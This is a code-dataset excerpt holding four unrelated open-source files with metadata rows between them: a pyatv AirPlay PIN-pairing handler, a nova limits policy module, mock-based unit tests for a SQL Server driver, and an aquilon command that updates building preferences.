from pyatv.support.http import ClientSessionManager, HttpConnection, http_connect
_LOGGER = logging.getLogger(__name__)
class AirPlayPairingHandler(PairingHandler):
"""Base class for API used to pair with an Apple TV."""
def __init__(
self, config: conf.AppleTV, session_manager: ClientSessionManager, _
) -> None:
"""Initialize a new MrpPairingHandler."""
super().__init__(session_manager, config.get_service(Protocol.AirPlay))
self.http: Optional[HttpConnection] = None
self.address: str = str(config.address)
self.pairing_procedure: Optional[AirPlayPairingProcedure] = None
self.credentials: LegacyCredentials = self._setup_credentials()
self.pin_code: Optional[str] = None
self._has_paired: bool = False
def _setup_credentials(self) -> LegacyCredentials:
# If service has credentials, use those. Otherwise generate new.
if self.service.credentials is None:
return new_credentials()
return LegacyCredentials.parse(self.service.credentials)
@property
def has_paired(self) -> bool:
"""If a successful pairing has been performed."""
return self._has_paired
async def close(self) -> None:
"""Call to free allocated resources after pairing."""
await super().close()
if self.http:
self.http.close()
async def begin(self) -> None:
"""Start pairing process."""
_LOGGER.debug("Starting AirPlay pairing with credentials %s", self.credentials)
srp: SRPAuthHandler = SRPAuthHandler(self.credentials)
srp.initialize()
self.http = await http_connect(self.address, self.service.port)
self.pairing_procedure = AirPlayPairingProcedure(self.http, srp)
self._has_paired = False
return await error_handler(
self.pairing_procedure.start_pairing, exceptions.PairingError
)
async def finish(self) -> None:
"""Stop pairing process."""
if not self.pairing_procedure:
raise exceptions.PairingError("pairing was not started")
if not self.pin_code:
raise exceptions.PairingError("no pin given")
self.service.credentials = str(
await error_handler(
self.pairing_procedure.finish_pairing,
exceptions.PairingError,
binascii.hexlify(self.credentials.identifier).decode("ascii").upper(),
self.pin_code,
)
)
self._has_paired = True
def pin(self, pin: int) -> None:
"""Pin code used for pairing."""
self.pin_code = str(pin).zfill(4)
_LOGGER.debug("AirPlay PIN changed to %s", self.pin_code)
@property
def device_provides_pin(self) -> bool:
"""Return True if remote device presents PIN code, else False."""
return True
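
# Minimal usage sketch (hypothetical config/session objects; error handling
# omitted) of the pairing flow implemented above:
#   handler = AirPlayPairingHandler(config, session_manager, None)
#   await handler.begin()    # device displays a PIN
#   handler.pin(1234)
#   await handler.finish()   # credentials stored on handler.service.credentials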
|
mit
| 1,528,977,526,204,508,200
| 35.633333
| 87
| 0.657264
| false
| 4.157629
| false
| false
| false
|
klmitch/nova
|
nova/policies/limits.py
|
1
|
2189
|
# Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
BASE_POLICY_NAME = 'os_compute_api:limits'
OTHER_PROJECT_LIMIT_POLICY_NAME = 'os_compute_api:limits:other_project'
DEPRECATED_POLICY = policy.DeprecatedRule(
'os_compute_api:os-used-limits',
base.RULE_ADMIN_API,
)
DEPRECATED_REASON = """
Nova API policies are introducing new default roles with scope_type
capabilities. Old policies are deprecated and will silently be ignored
starting with the nova 23.0.0 release.
"""
limits_policies = [
policy.DocumentedRuleDefault(
name=BASE_POLICY_NAME,
check_str=base.RULE_ANY,
description="Show rate and absolute limits for the current user "
"project",
operations=[
{
'method': 'GET',
'path': '/limits'
}
],
scope_types=['system', 'project']),
policy.DocumentedRuleDefault(
name=OTHER_PROJECT_LIMIT_POLICY_NAME,
check_str=base.SYSTEM_READER,
description="""Show rate and absolute limits of other project.
This policy only checks if the user has access to the requested
project limits. And this check is performed only after the check
os_compute_api:limits passes""",
operations=[
{
'method': 'GET',
'path': '/limits'
}
],
scope_types=['system'],
deprecated_rule=DEPRECATED_POLICY,
deprecated_reason=DEPRECATED_REASON,
deprecated_since='21.0.0'),
]
def list_rules():
return limits_policies
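
# list_rules() is the standard hook oslo.policy tooling calls to collect a
# module's defaults; a registration sketch (hypothetical enforcer instance):
#   enforcer.register_defaults(list_rules())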
|
apache-2.0
| -8,685,073,734,015,824,000
| 30.724638
| 78
| 0.660576
| false
| 4.083955
| false
| false
| false
|
scm-spain/slippin-jimmy
|
tests/slippinj/databases/drivers/test_sqlserver.py
|
1
|
5305
|
import logging
from mock import Mock
from slippinj.databases.drivers.sqlserver import Sqlserver
class TestSqlserver:
def setup_method(self, method):
self.logger = logging.getLogger('test')
self.logger.addHandler(logging.NullHandler())
def teardown_method(self, method):
self.logger = None
def test_get_tables_info_when_no_table_list_is_provided(self):
mocked_table_list_query_cursor = Mock()
mocked_table_list_query_cursor.execute = Mock(return_value=True)
mocked_table_list_query_cursor.fetchall = Mock(return_value=[{'table_name': 'unit'}, {'table_name': 'test'}])
mocked_table_count_query_cursor = Mock()
mocked_table_count_query_cursor.execute = Mock(return_value=True)
mocked_table_count_query_cursor.fetchone = Mock(return_value=[10])
columns = {
'table_name': '',
'column_name': 'column',
'data_type': 'string',
'character_maximum_length': '1',
'is_nullable': 'NO',
'column_default': ''
}
tables_columns = []
columns.update(table_name='unit')
tables_columns.append(columns.copy())
columns.update(table_name='test')
tables_columns.append(columns.copy())
mocked_table_columns_query_cursor = Mock()
mocked_table_columns_query_cursor.execute = Mock(return_value=True)
mocked_table_columns_query_cursor.fetchall = Mock(return_value=tables_columns)
mocked_table_top_query_cursor = Mock()
mocked_table_top_query_cursor.execute = Mock(return_value=True)
mocked_table_top_query_cursor.fetchall = Mock(return_value=[])
mocked_mssql = Mock()
mocked_mssql.cursor = Mock(side_effect=[mocked_table_list_query_cursor, mocked_table_count_query_cursor,
mocked_table_columns_query_cursor, mocked_table_top_query_cursor])
mocked_builder = Mock()
mocked_builder.build = Mock(return_value=mocked_mssql)
expected = {'tables': {'test': {'columns': [{'character_maximum_length': '1',
'column_default': '',
'column_name': 'column',
'data_type': 'string',
'is_nullable': 'NO'}],
'count': 10,
'rows': []},
'unit': {'columns': [{'character_maximum_length': '1',
'column_default': '',
'column_name': 'column',
'data_type': 'string',
'is_nullable': 'NO'}],
'count': 10,
'rows': []}},
'db_connection_string': 'jdbc:sqlserver://test'
}
        assert expected == Sqlserver(mocked_builder, self.logger, db_host='test').get_all_tables_info(None, None, None)
def test_get_tables_info_when_table_list_has_been_provided(self):
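        # Only three cursors are needed here: the table list query is skipped
        # because an explicit table list ('unit') is passed in.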
mocked_table_count_query_cursor = Mock()
mocked_table_count_query_cursor.execute = Mock(return_value=True)
mocked_table_count_query_cursor.fetchone = Mock(return_value=[10])
columns = {
'table_name': '',
'column_name': 'column',
'data_type': 'string',
'character_maximum_length': '1',
'is_nullable': 'NO',
'column_default': ''
}
tables_columns = []
columns.update(table_name='unit')
tables_columns.append(columns.copy())
columns.update(table_name='test')
tables_columns.append(columns.copy())
mocked_table_columns_query_cursor = Mock()
mocked_table_columns_query_cursor.execute = Mock(return_value=True)
mocked_table_columns_query_cursor.fetchall = Mock(return_value=tables_columns)
mocked_table_top_query_cursor = Mock()
mocked_table_top_query_cursor.execute = Mock(return_value=True)
mocked_table_top_query_cursor.fetchall = Mock(return_value=[])
mocked_mssql = Mock()
mocked_mssql.cursor = Mock(side_effect=[mocked_table_count_query_cursor,
mocked_table_columns_query_cursor, mocked_table_top_query_cursor])
mocked_builder = Mock()
mocked_builder.build = Mock(return_value=mocked_mssql)
expected = {'tables': {
'unit': {'columns': [{'character_maximum_length': '1',
'column_default': '',
'column_name': 'column',
'data_type': 'string',
'is_nullable': 'NO'}],
'count': 10,
'rows': []}},
'db_connection_string': 'jdbc:sqlserver://test'
}
        assert expected == Sqlserver(mocked_builder, self.logger, db_host='test').get_all_tables_info('unit', None, None)
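# These tests are pure-mock and can be run standalone, e.g. (assuming pytest
# is installed): pytest tests/slippinj/databases/drivers/test_sqlserver.py -v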
|
apache-2.0
| 7,177,636,296,262,225,000
| 45.535088
| 123
| 0.514986
| false
| 4.355501
| true
| false
| false
|
guillaume-philippon/aquilon
|
lib/aquilon/worker/commands/update_building_preference.py
|
1
|
2073
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Contains the logic for `aq update building preference`. """
from aquilon.aqdb.model import BuildingPreference, Building
from aquilon.worker.broker import BrokerCommand
from aquilon.worker.dbwrappers.change_management import validate_prod_archetype
from aquilon.worker.dbwrappers.cluster import get_clusters_by_locations
class CommandUpdateBuildingPreference(BrokerCommand):
requires_plenaries = True
required_parameters = ["building_pair", "archetype"]
def render(self, session, logger, plenaries, building_pair, archetype,
prefer, justification, reason, user, **_):
db_pref = BuildingPreference.get_unique(session,
building_pair=building_pair,
archetype=archetype,
compel=True)
db_pref.lock_row()
validate_prod_archetype(db_pref.archetype, user, justification, reason, logger)
for db_clus in get_clusters_by_locations(session, (db_pref.a, db_pref.b),
db_pref.archetype):
plenaries.add(db_clus)
if prefer:
dbbuilding = Building.get_unique(session, prefer, compel=True)
db_pref.prefer = dbbuilding
session.flush()
plenaries.write(verbose=True)
return
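# Illustrative broker invocation this command backs (flag spellings are
# assumptions for demonstration, not taken from the aquilon CLI docs):
#
#     aq update_building_preference --building_pair bu1,bu2 \
#         --archetype hacluster --prefer bu1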
|
apache-2.0
| 5,816,525,462,180,406,000
| 38.865385
| 87
| 0.655572
| false
| 4.064706
| false
| false
| false
|